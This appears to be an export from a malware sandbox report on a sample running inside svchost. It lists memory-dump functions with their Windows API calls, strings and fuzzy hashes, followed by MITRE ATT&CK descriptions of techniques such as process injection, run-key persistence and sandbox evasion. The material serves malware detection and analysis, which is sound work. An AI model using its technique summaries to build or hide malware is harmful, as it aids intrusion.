Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Info$LongScroll$ClassPrintRectVisiblememset
String ID:
API String ID: 406580094-0
Opcode ID: a7090951ee0202b829c09747292ce5599c78526f121db7eb5d2c337133bb83f9
Instruction ID: 743e1fb53891f33432b5a6be43492152945a2f208b9e02de152cb034ad70a2ae
Opcode Fuzzy Hash: a7090951ee0202b829c09747292ce5599c78526f121db7eb5d2c337133bb83f9
Instruction Fuzzy Hash: 02F06872B5021437DA11B659ACC5FAFB7ADDB85B50F010216F904A73D0DEB1AD014AA5

Function 02D073A0 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,00004D42,?,02D25279,00004D42), ref: 02D073B8
LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000,?,02D25279,00004D42), ref: 02D073C7
WriteFile.KERNEL32(00000000,02D25279,0000000E,00004D42,00000000,?,02D25279,00004D42), ref: 02D073D9
UnlockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000,?,02D25279,00004D42), ref: 02D073E9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$LockPointerUnlockWrite
String ID:
API String ID: 3342219707-0
Opcode ID: fbd8af5ace698f06fbb15e2f7d60772e4323c0150fe40f0df3037f2cd6b3b366
Instruction ID: 833adae54ad7b27a44ebf2524713b7f07a8c183db8e346e6c6564e4cc1089554
Opcode Fuzzy Hash: fbd8af5ace698f06fbb15e2f7d60772e4323c0150fe40f0df3037f2cd6b3b366
Instruction Fuzzy Hash: BEF012B5691208BFE7108E61DC89FAF7BACEB45785F508416FE04DA280D6705E50C6B5

Function 02D03E50 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02D040EB,?), ref: 02D03E5C
HeapAlloc.KERNEL32(00000000,?,02D040EB,?), ref: 02D03E63
_snprintf.MSVCRT ref: 02D03EA2

Strings

%d.%d.%d.%d, xrefs: 02D03E9A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess_snprintf
String ID: %d.%d.%d.%d
API String ID: 1060465051-3491811756
Opcode ID: d0bd74a43d481aeb621c2d1aa79e93125efd195da18dbed916c6cd8b0df8394e
Instruction ID: 8156482901f428b6cd317c2bf1d192d52300f2d6f2b1fffe2cf239625cee7714
Opcode Fuzzy Hash: d0bd74a43d481aeb621c2d1aa79e93125efd195da18dbed916c6cd8b0df8394e
Instruction Fuzzy Hash: ECF081B1940B10AFC370CF69A844B57BBF8EF0D611B40892EF689C6741D234A6008BA0

Function 02D1A240 Relevance: 6.0, APIs: 4, Instructions: 37synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,74E17390,?,?,02D16AFD), ref: 02D1A25A
CreateThread.KERNEL32(00000000,00000000,02D1A2B0,00000000,00000000,00000000), ref: 02D1A274
GetHandleInformation.KERNEL32(00000000,?,?,?,02D16AFD), ref: 02D1A28C
CloseHandle.KERNEL32(00000000,?,?,02D16AFD), ref: 02D1A29D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CreateHandle$CloseInformationMutexThread
String ID:
API String ID: 3835061634-0
Opcode ID: da57432ac97f3ad79a439893209a50e0378cae51ec149b594aa2997b151305ac
Instruction ID: 26d0062bb3db271c1ce8551a85f2ff0eee2f917d074c804a54d27b0a21e403a5
Opcode Fuzzy Hash: da57432ac97f3ad79a439893209a50e0378cae51ec149b594aa2997b151305ac
Instruction Fuzzy Hash: B2F06D39E82314BFE7208F60BC0AB5A3BE8AB00B11F644456FD00ABBC0D7B1AD10C794

Function 02D1EA20 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02D1882E,00000000,02D10943,?,?,?,?,?,?), ref: 02D1EA30
CreateThread.KERNEL32(00000000,00000000,02D1E8D0,00000000,00000000,00000000), ref: 02D1EA45
GetHandleInformation.KERNEL32(00000000,02D10943,00000000,?,?,02D1882E,00000000), ref: 02D1EA63
CloseHandle.KERNEL32(00000000,?,?,02D1882E,00000000), ref: 02D1EA74

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: 31f060b25ea1a1cb340ea55cf7cc4e2d6b138194010cd4cdc7290a6f9b4f3a63
Instruction ID: 8e0a0316d30ddde657564dd6f3771ae0be710f1b03d38470e8a31681a05843ea
Opcode Fuzzy Hash: 31f060b25ea1a1cb340ea55cf7cc4e2d6b138194010cd4cdc7290a6f9b4f3a63
Instruction Fuzzy Hash: C3F03074E84325BBE720CEA4BC1AB5937DCAB14B45F644554FE09E27C0D7A1AD10C6A4

Function 02D1B390 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02D1868E,00000000,02D10943,?,?,?,?,?,?), ref: 02D1B3A0
CreateThread.KERNEL32(00000000,00000000,02D1B240,00000000,00000000,00000000), ref: 02D1B3B5
GetHandleInformation.KERNEL32(00000000,02D10943,00000000,?,?,02D1868E,00000000), ref: 02D1B3D3
CloseHandle.KERNEL32(00000000,?,?,02D1868E,00000000), ref: 02D1B3E4

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: 71299437936720733b1eb751d3c762bfe841e02496db2f0d48ccac7ecba1d709
Instruction ID: dcdf0d1dd00652f7cc72d9c9295ced2e56a8c81a8e344a7cd0b6b1667cea74af
Opcode Fuzzy Hash: 71299437936720733b1eb751d3c762bfe841e02496db2f0d48ccac7ecba1d709
Instruction Fuzzy Hash: A3F0E934AC0314BBE7209F65BC49F5A37DCAB18759F304546F905E27C0E7B0AD20C664

Function 02D1F930 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02D188DE,00000000,02D10943,?,?,?,?,?,?), ref: 02D1F940
CreateThread.KERNEL32(00000000,00000000,02D1F7E0,00000000,00000000,00000000), ref: 02D1F955
GetHandleInformation.KERNEL32(00000000,02D10943,00000000,?,?,02D188DE,00000000), ref: 02D1F973
CloseHandle.KERNEL32(00000000,?,?,02D188DE,00000000), ref: 02D1F984

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: 2c5ef28d9c84e953712ed6a9d7fa90eed99a15ecd5adbcc53d99180a9883963b
Instruction ID: 7ebaccad9ffba0764538b5b7d9341e7069c65e903e7b04487fe2bce737fef236
Opcode Fuzzy Hash: 2c5ef28d9c84e953712ed6a9d7fa90eed99a15ecd5adbcc53d99180a9883963b
Instruction Fuzzy Hash: 67F0B474B84318BFE7209F64BC0AB5E77DCAB14785F644A44F909E2BC0D7B0AD10C664

Function 02D1F350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

public, xrefs: 02D1F452
private, xrefs: 02D1F3B0

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: private$public
API String ID: 0-4176808989
Opcode ID: 33594743d1661c5636d47c56578fbd34bfa48635f7690f1e69cc298077953526
Instruction ID: 5c7ba8c3202f8f2c349e94715f477ded192241a33a6970137e5aba9c60a75b39
Opcode Fuzzy Hash: 33594743d1661c5636d47c56578fbd34bfa48635f7690f1e69cc298077953526
Instruction Fuzzy Hash: 684136326043155FCB348B6CB4563BA73A2FB85228B488696D88ACBF94F7659E45C780

Function 02D03EC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02D03EC2
_snprintf.MSVCRT ref: 02D03F26

Strings

%dd %dh %dm, xrefs: 02D03F17

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CountTick_snprintf
String ID: %dd %dh %dm
API String ID: 3495410349-3074259717
Opcode ID: 57b1a4a52ba13d24cc83f10da0f104b10991a847f08e383e333f70d4b8db8fa3
Instruction ID: fe27d680571eed9316a2aff1193c334088c1aa9deacd8c2d256784b820489bfc
Opcode Fuzzy Hash: 57b1a4a52ba13d24cc83f10da0f104b10991a847f08e383e333f70d4b8db8fa3
Instruction Fuzzy Hash: ACF0E262B4101117A31C581DBC0AAAA5A8B87E832138CC63DFD0ACF3D8DCF49C5141D0

Function 02D0E250 Relevance: 5.1, APIs: 4, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,02D0FCDD,00000000), ref: 02D0E2A3
HeapValidate.KERNEL32(00000000,?,00000000,?,?,02D0FCDD,00000000), ref: 02D0E2A6
GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,02D0FCDD,00000000), ref: 02D0E2B2
HeapFree.KERNEL32(00000000,?,00000000,?,?,02D0FCDD,00000000), ref: 02D0E2B5

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: 1da8ec60e19c7bc01c32c8128d0433e145fa3555207f56f18d0392016a6824cf
Instruction ID: 31d2d01664a36bce96de2b801635bfaef55daa53819bd52eaebaccac466e6f21
Opcode Fuzzy Hash: 1da8ec60e19c7bc01c32c8128d0433e145fa3555207f56f18d0392016a6824cf
Instruction Fuzzy Hash: 87217CB69412109F8B54CF79D8C472A7BE9FA4C2283258D7ED50ADB760E731DC52CB90

Function 02D2ABF0 Relevance: 5.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D2ABFE
malloc.MSVCRT ref: 02D2AC13
malloc.MSVCRT ref: 02D2AC39
malloc.MSVCRT ref: 02D2AC54

Part of subcall function 02D2A520: free.MSVCRT(?,?,?,76337310,?,02D2CA12,?,?,?,02D29E28), ref: 02D2A54F
Part of subcall function 02D2A520: free.MSVCRT(02D2CA12,?,?,76337310,?,02D2CA12,?,?,?,02D29E28), ref: 02D2A55F

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 01d8b24927e25ac6452813d74a51b0e12e62209a940cf0f5f8be4abfd5c59d2d
Instruction ID: 2e881d2c6d230c67b37f60fbfd7deb46f5db1ddb20207010fb36ff1c1f89fe36
Opcode Fuzzy Hash: 01d8b24927e25ac6452813d74a51b0e12e62209a940cf0f5f8be4abfd5c59d2d
Instruction Fuzzy Hash: F721ADB5A013059FD710CF1AD884A46FBE8FF99710F15C5AAE5488B366D7B1E814CFA0

Function 02D0E840 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-05A9F5B4,?,02D0FA47,?,?,02D0EF16,00000000,00000008,?,02D0FA47,Content-Length,00000008,?,02D0FA47,Transfer-Encoding), ref: 02D0E87F
HeapAlloc.KERNEL32(00000000,?,02D0EF16,00000000,00000008,?,02D0FA47,Content-Length,00000008,?,02D0FA47,Transfer-Encoding,00000008,HTTP/1.,00000007,?), ref: 02D0E886
memset.MSVCRT ref: 02D0E896
memcpy.MSVCRT ref: 02D0E8A1

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcessmemcpymemset
String ID:
API String ID: 471586229-0
Opcode ID: 18c2709073cfa5aee4243c25e0ebf50e19696001186430ed19228886a4d54ecb
Instruction ID: 1befe9c36b6afc8868b1533463a72db68367375230b65fda4d5eb4351995398b
Opcode Fuzzy Hash: 18c2709073cfa5aee4243c25e0ebf50e19696001186430ed19228886a4d54ecb
Instruction Fuzzy Hash: F701F2336016156B97209A69ACC4FA7B39CEF96764B448615FD04DB3D0DB20DD00C7F8

Function 02D1A860 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000018,?,00000000,?,02D1056E,?,?,02D10D4A,?), ref: 02D1A898
HeapAlloc.KERNEL32(00000000,?,02D1056E,?,?,02D10D4A,?), ref: 02D1A89F
memset.MSVCRT ref: 02D1A8AF
memcpy.MSVCRT ref: 02D1A8BD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcessmemcpymemset
String ID:
API String ID: 471586229-0
Opcode ID: 64c025740afc21f9da7414194d5824e185fd9525fe91d335c1e3566de75ca0b0
Instruction ID: a0f30913077283bb31e0a12379112126225a154b500dee09fcfcc479ce8584b8
Opcode Fuzzy Hash: 64c025740afc21f9da7414194d5824e185fd9525fe91d335c1e3566de75ca0b0
Instruction Fuzzy Hash: D70147326426067BD3108A68BC48FABB79DEF52754F004315F9049B780EB20EC05C7E0

Function 02D0F0D0 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-05A9F5B5,?,?,00000000,?,02D0F31A,?,?,-05A9F5C8,00000000,00000000), ref: 02D0F0E8
HeapAlloc.KERNEL32(00000000,?,02D0F31A,?,?,-05A9F5C8,00000000,00000000), ref: 02D0F0EF
memset.MSVCRT ref: 02D0F0FF
memcpy.MSVCRT ref: 02D0F10A

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcessmemcpymemset
String ID:
API String ID: 471586229-0
Opcode ID: 560434a5f31271d337ca4ca7e5002357d2c55a1a21da13b8cc2da4f70af63b8f
Instruction ID: 00a468e2742df5fc44e5b298e850993ec88efd8d5ae90a2efd603e479e1d48b4
Opcode Fuzzy Hash: 560434a5f31271d337ca4ca7e5002357d2c55a1a21da13b8cc2da4f70af63b8f
Instruction Fuzzy Hash: B6F0A0776416113BC6206A99AC85F8B779CEB97B60F504114FA04AB381CA20DD1087F1

Function 02D0E1D0 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,7591F380,?,02D0E5D9,?,00000000,?,02D0FCAC), ref: 02D0E1E4
HeapValidate.KERNEL32(00000000,?,02D0FCAC), ref: 02D0E1E7
GetProcessHeap.KERNEL32(00000000,?,?,02D0FCAC), ref: 02D0E1F4
HeapFree.KERNEL32(00000000,?,02D0FCAC), ref: 02D0E1F7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: 4af7db8b667d55fa3c713ee183b10720a4c73e87cec43dc8ab8fee46196e0f90
Instruction ID: 74d33bac2f93e58384e73b82dc91b684ba86fb66692e5ab5be41a2c6a72f885d
Opcode Fuzzy Hash: 4af7db8b667d55fa3c713ee183b10720a4c73e87cec43dc8ab8fee46196e0f90
Instruction Fuzzy Hash: 79F030785412226BEB505F79A8C8B9B77DDAF19695F900841E508D3350D7249C10DAA1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
